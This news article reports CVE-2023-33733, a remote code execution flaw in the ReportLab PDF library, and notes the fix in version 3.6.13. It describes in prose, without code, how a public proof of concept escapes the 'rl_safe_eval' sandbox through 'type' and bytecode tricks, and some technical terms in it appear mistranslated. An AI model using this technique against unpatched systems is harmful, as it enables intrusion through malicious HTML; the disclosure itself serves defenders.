Critical flaw discovered in the ReportLab Toolkit: remote code execution risk

A researcher has revealed a hands-on experiment of a flaw that allows remote code execution, known as RCE, that affects the ReportLab Toolkit. This tool, a Python library widely used by many projects to convert HTML files to PDF, has a monthly download volume of about 3.5 million on the PyPI (Python Package Index) platform. The Test Exploit (PoC) for such a flaw, identified as CVE-2023-33733, was posted yesterday on GitHub, accompanied by an explanation that provides technical details about the vulnerability, thus increasing the likelihood of exploitation in the wild.

Bypass of the "rl_safe_eval" and risk of accessing dangerous functions

The problem emerges from the ability to circumvent sandbox restrictions on the "rl_safe_eval" function. This function has the task of preventing the execution of malicious code, and its bypass can lead the attacker to access potentially dangerous Python built-in functions. The "rl_safe_eval" function was introduced as a safety measure to prevent a similar remote code execution issue discovered in 2019, which is why the researcher focused on bypassing it.

Creation of malicious functions and objects and potential execution of arbitrary actions

The presented PoC retrieves the built-in "type" function, which helps to create a new class called "Word". This inherits from the "str" class and can bypass security checks by providing access to sensitive attributes such as "queues". Next, "type" is called on itself to bypass safe eval checks for argument count restrictions. This allows the attacker to abuse the original "type" function to create new classes and objects. This leads to the construction of a malicious function from the bytecode of a compiled function which, if executed, can perform an arbitrary action. In the researcher example, it calls an OS command to create a file called "exploited" in the "/tmp/" directory.

Risks associated with the exploit and security recommendations

The entire exploit code needs to be eval in a single expression, so use the "list comprehension" trick to structure it that way. Cure53 researcher Elyas Damej warns in his paper that the CVE-2023-33733 exploit is as simple as embedding malicious code in an HTML file that will be converted to PDF on software using the ReportLab library. The widespread use of this library and the publication of an exploit put many users at risk. Software vendors using the library can mitigate the risk to the supply chain by applying the available security update. Damej informed BleepingComputer that the issue was reported to ReportLab developers upon discovery, and a fix was made with version 3.6.13, released on April 27, 2023. The researcher clarified that the vulnerability affects all previous versions of the library.